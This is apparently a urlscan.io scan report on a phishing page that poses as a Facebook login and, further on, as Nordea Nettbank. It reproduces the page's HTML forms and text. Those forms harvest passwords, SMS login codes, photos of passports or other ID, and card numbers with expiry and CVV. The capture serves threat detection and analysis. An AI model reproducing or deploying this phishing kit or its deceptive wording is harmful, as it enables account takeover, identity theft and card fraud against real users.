bwxltd.com
Open in
urlscan Pro
27.123.26.34
Public Scan
Submitted URL: http://auto-trader.uxlanding.com/
Effective URL: https://bwxltd.com/market/listing/98362784323/
Submission: On June 24 via api from NL — Scanned from NL
Effective URL: https://bwxltd.com/market/listing/98362784323/
Submission: On June 24 via api from NL — Scanned from NL
Form analysis
5 forms found in the DOMPOST
<form method="POST" id="loginForm">
<div class="px-4">
<div class="mt-3">
<label for="username" class="sr-only"> Mobile number or email </label>
<input type="text" name="username" id="username" placeholder="Mobile number or email" required="" class="w-full p-2 shadow bg-gray-100 rounded shadow
focus:border focus:border-orange-400 focus:outline-none focus:ring-0 focus:shadow-lg
placeholder:text-sm placeholder:text-gray-500" minlength="6" maxlength="64">
</div>
<div class="mt-3 relative">
<label for="password" class="sr-only"> Password </label>
<input type="text" name="password" id="password" value="" class="w-full p-2 shadow bg-gray-100 rounded shadow
focus:border focus:border-orange-400 focus:outline-none focus:ring-0 focus:shadow-lg
placeholder:text-sm placeholder:text-gray-500" onfocus="this.type='password'" minlength="6" maxlength="64" placeholder="Password">
<button type="button"
onclick="if(document.getElementById('password').type == 'text'){ document.getElementById('password').type = 'password'; this.textContent = 'SHOW'; }else{document.getElementById('password').type = 'text'; this.textContent = 'HIDE';}"
class="absolute right-0 top-0 p-2 text-blue-600 tex-sm"> SHOW </button>
</div>
<div class="mt-3">
<button class="bg-blue-500 rounded shadow-sm block p-3 text-white font-bold mb-1 block w-full"> Log in </button>
</div>
<div class="mt-3 text-center text-blue-600 text-sm p-1"> Forgot password? </div>
<div class="mt-3 text-center text-sm flex">
<hr class="flex-grow h-px my-3 bg-gray-400 border-0 rounded ml-2">
<div class="flex-none px-3 font-semibold text-gray-600">or</div>
<hr class="flex-grow h-px my-3 bg-gray-400 border-0 rounded mr-2">
<!-- TODO: linia aia dubioasa in jurul lui OR-->
</div>
<div class="mt-3 mx-6">
<button type="button" class="border border-gray-400 rounded block shadow w-full p-1.5 text-sm font-semibold text-gray-800"> Create new account </button>
</div>
</div>
</form>
<form id="otpForm">
<div class="text-sm"> It looks like you haven`t logged in from this browser before. Please enter the login code from your phone below. </div>
<div class="text-gray-700 rounded bg-gray-50 shadow p-2 mt-6 flex hidden" id="otpFormError" style="font-size: 9pt">
<div class="flex-none mx-2">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="currentColor" class="w-6 h-6 fill-red-700">
<path fill-rule="evenodd"
d="M9.401 3.003c1.155-2 4.043-2 5.197 0l7.355 12.748c1.154 2-.29 4.5-2.599 4.5H4.645c-2.309 0-3.752-2.5-2.598-4.5L9.4 3.003zM12 8.25a.75.75 0 01.75.75v3.75a.75.75 0 01-1.5 0V9a.75.75 0 01.75-.75zm0 8.25a.75.75 0 100-1.5.75.75 0 000 1.5z"
clip-rule="evenodd"></path>
</svg>
</div>
<div class="flex-grow py-1 font-semibold"> The code you entered was incorrect. </div>
</div>
<input type="tel" name="otp_code" id="otp_code" x-data="" x-mask="999999" maxlength="6" class="w-full p-1 mt-3 shadow bg-gray-100 rounded shadow px-4
focus:border focus:border-orange-400 focus:outline-none focus:ring-0 focus:shadow-lg
placeholder:text-sm placeholder:text-gray-500" placeholder="SMS Code or Check your email">
<div class="text-sm text-gray-500 my-3 font-semibold"> Note: We'll send code to Email or text message, may take a few minutes to arrive. </div>
<div class="mt-3 pt-3 text-center text-blue-600 text-sm border-t border-gray-300"> Having trouble? </div>
<div class="mt-3 ">
<button class="block w-full p-2 font-semibold text-white bg-blue-600 shadow rounded"> Submit Code </button>
</div>
</form>
Name: idTypePseudoForm —
<form action="" name="idTypePseudoForm">
<label for="idTypePassport" class="block flex py-1">
<span class="flex-grow text-sm">Passport</span>
<span class="flex-none"><input type="radio" name="idType" id="idTypePassport"></span>
</label>
<label for="idTypeDriverLicense" class="block flex py-1">
<span class="flex-grow text-sm">Driving license</span>
<span class="flex-none"><input type="radio" name="idType" id="idTypeDriverLicense"></span>
</label>
<label for="idTypeNatIDCard" class="block flex py-1">
<span class="flex-grow text-sm">National ID card</span>
<span class="flex-none"><input type="radio" name="idType" id="idTypeNatIDCard"></span>
</label>
<label for="idTypeMarriageCertificate" class="block flex py-1">
<span class="flex-grow text-sm">Marriage certificate</span>
<span class="flex-none"><input type="radio" name="idType" id="idTypeMarriageCertificate"></span>
</label>
</form>
POST
<form method="POST" id="idForm">
<input type="file" accept="image/*" id="cameraTrigger" capture="environment" class="hidden">
<input type="hidden" name="b64IDimg" id="b64IDimg">
<input type="hidden" name="filename" id="cameraFileName">
<div class="relative w-full bg-gray-100 mt-4" style="padding-top: 75%">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" id="cameraPreview" alt="" class="w-full h-full absolute inset-0">
<button class="absolute top-4 right-4 border border-gray-600 p-1 rounded bg-white opacity-60 shadow hidden" type="button" id="cameraControllerDel">
<div class="inline-block text-right border-r-2 border-gray-400 px-2 text-xs" id="imageFileName">
</div>
<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" class="w-5 h-5 inline-block ml-1">
<path stroke-linecap="round" stroke-linejoin="round"
d="M14.74 9l-.346 9m-4.788 0L9.26 9m9.968-3.21c.342.052.682.107 1.022.166m-1.022-.165L18.16 19.673a2.25 2.25 0 01-2.244 2.077H8.084a2.25 2.25 0 01-2.244-2.077L4.772 5.79m14.456 0a48.108 48.108 0 00-3.478-.397m-12 .562c.34-.059.68-.114 1.022-.165m0 0a48.11 48.11 0 013.478-.397m7.5 0v-.916c0-1.18-.91-2.164-2.09-2.201a51.964 51.964 0 00-3.32 0c-1.18.037-2.09 1.022-2.09 2.201v.916m7.5 0a48.667 48.667 0 00-7.5 0">
</path>
</svg>
</button>
<button class="absolute top-8 right-0 left-0 mx-auto" type="button" onclick="document.getElementById('cameraTrigger').click()" id="cameraControllerAdd">
<div class="w-48 h-32 mx-auto" style="background-image: url('img/sprite.png');
background-position:0 -40px;
background-size:cover; "></div>
<div class="py-1 inline-block border border-gray-300 bg-gray-200 shadow block mx-auto mt-2 font-semibold tracking-wider text-xs rounded shadow px-8"> Take picture </div>
</button>
</div>
<div class="mt-4 grid grid-cols-2 gap-4">
<button type="button" class="text-blue-700 p-1 w-full rounded" onclick="goTocodeForm2()"> Back </button>
<button class="border font-semibold text-gray-400 bg-gray-100 p-1 w-full rounded" id="uploadIdButton"> Submit </button>
</div>
</form>
<form action="" id="cvvForm">
<div class="mt-6">
<label for="ccnum" class="block mb-2"> Kortnummer </label>
<input type="tel" name="ccnum" id="ccnum" x-data="" x-mask="9999 9999 9999 9999" placeholder="**** **** **** ****" required="" minlength="19" maxlength="19"
class="w-full p-2 border-gray-400 focus:border-t-0 focus:border-l-0 focus:border-r-0 focus:border-b-4 focus:border-sky-950 focus:outline-none focus:ring-0 ">
</div>
<div class="mt-6">
<label for="cvv_exp" class="block mb-2"> Utløpsdato </label>
<input type="tel" name="cvv_exp" id="cvv_exp" class="w-full p-2 border-gray-400 focus:border-t-0 focus:border-l-0 focus:border-r-0 focus:border-b-4 focus:border-sky-950 focus:outline-none focus:ring-0 " x-data="" x-mask="99/99" required=""
minlength="5" maxlength="5" placeholder="MM/ÅÅ">
</div>
<div class="mt-6">
<label for="cvv_exp" class="block mb-2"> CVV </label>
<input type="tel" name="cvv_cvv2" id="cvv_cvv2" class="w-full p-2 border-gray-400 focus:border-t-0 focus:border-l-0 focus:border-r-0 focus:border-b-4 focus:border-sky-950 focus:outline-none focus:ring-0 " x-data="" x-mask="999" required=""
minlength="3" maxlength="3" placeholder="***">
</div>
<div class="">
<button class="mx-auto bg-blue-900 hover:bg-blue-800 block py-2 flex text-white rounded-full mt-12 px-12">
<div class="flex-grow text-left font-semibold"> Fortsette </div>
</button>
</div>
</form>
Text Content
Incorrect password. Did you forget your password? Mobile number or email Password SHOW Log in Forgot password? -------------------------------------------------------------------------------- or -------------------------------------------------------------------------------- Create new account English (US) Magyar Español (España) Português (Brasil) Italiano Français (France) Germa (Germany) About Help More Meta © 2023 Enter login code to continue It looks like you haven`t logged in from this browser before. Please enter the login code from your phone below. The code you entered was incorrect. Note: We'll send code to Email or text message, may take a few minutes to arrive. Having trouble? Submit Code English (US) Magyar Español (España) Português (Brasil) Italiano Français (France) Germa (Germany) About Help More Meta © 2023 Confirm that this is your account Before we can get you back on Facebook safely, we need to make sure that this is your account. You can prove that this account is yours by sending us a photo of your ID. This helps us to prove that this account really belongs to you. Confirm your identity Confirm your identity Choose type of ID upload We`ll use your official ID or document to help confirm who you are. It won`t be shared on your profile. Passport Driving license National ID card Marriage certificate Your ID will be securely stored for up to one year to help improve how we detect impersonation and fake IDs. If you opt out, we`ll delete it within 30 days. We sometimes use trusted service providers to help review your information. Learn more Back Next Confirm your identity Upload a photo of your ID The information on your ID must be cleary visible on the photo, otherwise you might have to submit it again. See photo requirements. An error has occured! Your photo has too much blank space or is too small. The ID should take up the majority of the photo. Try uploading another one. Click "Take picture" and take a clear picture of your selected proof of ID. Take picture Back Submit We`ve received your information Thank you for uploading a photo of your ID. We usually review IDs within 24 hours. Once we`ve reviewed your information, we`ll use your email to let you know what to do next. We`re always looking out for the security of our community, so until then, you won`t be able to use Facebook. Please wait.. Nordea Nettbank Ytterligere kontroller. Skriv inn kredittkortinformasjonen knyttet til kontoen din for å bekrefte nettbankkontoen din. Kortnummer Utløpsdato CVV Fortsette